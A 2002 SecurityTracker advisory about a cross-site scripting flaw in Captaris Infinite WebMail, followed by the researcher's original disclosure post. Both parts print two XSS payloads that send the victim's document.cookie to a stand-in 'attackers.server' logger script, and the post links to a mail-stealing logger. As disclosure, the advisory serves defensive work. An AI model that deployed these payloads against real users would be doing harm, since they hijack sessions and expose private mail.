Captaris Infinite WebMail Server Input Validation Flaws Let Remote Users Conduct Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1005844 |
|
SecurityTracker URL: http://securitytracker.com/id/1005844
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Dec 22 2002
|
Impact:
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Exploit Included: Yes
|
Version(s): 3.61.05; other versions may also be affected
|
Description:
An input validation vulnerability was reported in the Captaris Infinite WebMail server. A remote user can conduct cross-site scripting attacks against Infinite WebMail users.
It is reported that the server does not filter user-supplied input in certain HTML tags to remove scripting code. A remote user can send a specially crafted e-mail to a target user to cause arbitrary scripting code to be executed on the target user's computer. The code will run in the security context of the Infinite WebMail server. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit content is provided. The first example will execute when the target user opens the e-mail. The second example will execute when the target user places the mouse pointer over the text.
<p style="left:expression(document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie)">
<b onMouseOver= "document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie\">
|
Impact:
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running Infinite WebMail, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: support.infinite.com/list.asp?p=WebMail (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 16 Dec 2002 18:23:10 -0500
Subject: Captaris (Infinite) WebMail XSS
|
I figured it was about time I hopped on the XSS band-wagon.
Captaris (www.captaris.com) Infinite WebMail application is vulnerable to
Cross-Site Scripting (XSS) attacks. The application fails to filter the
following tags that can both be used to redirect a user to an attack script:
Launch on e-mail open:
<p style="left:expression(document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie)">
Launch on mouse over:
<b onMouseOver= "document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie\">
I am sure there are other XSS attack methods that can also be utilized to
bypass their basic filtering.
A sample vulnerable service is provided by dog.com (www.dogmail.com), they
are running WebMail v3.61.05. A sample cookie and mail logger script that
will retrieve all of the messages in the users main mailbox has been
attached, and can also be found at
http://pedram.redhive.com/advisories/dogmail.cgi
-pedram
http://pedram.redhive.com
|
|
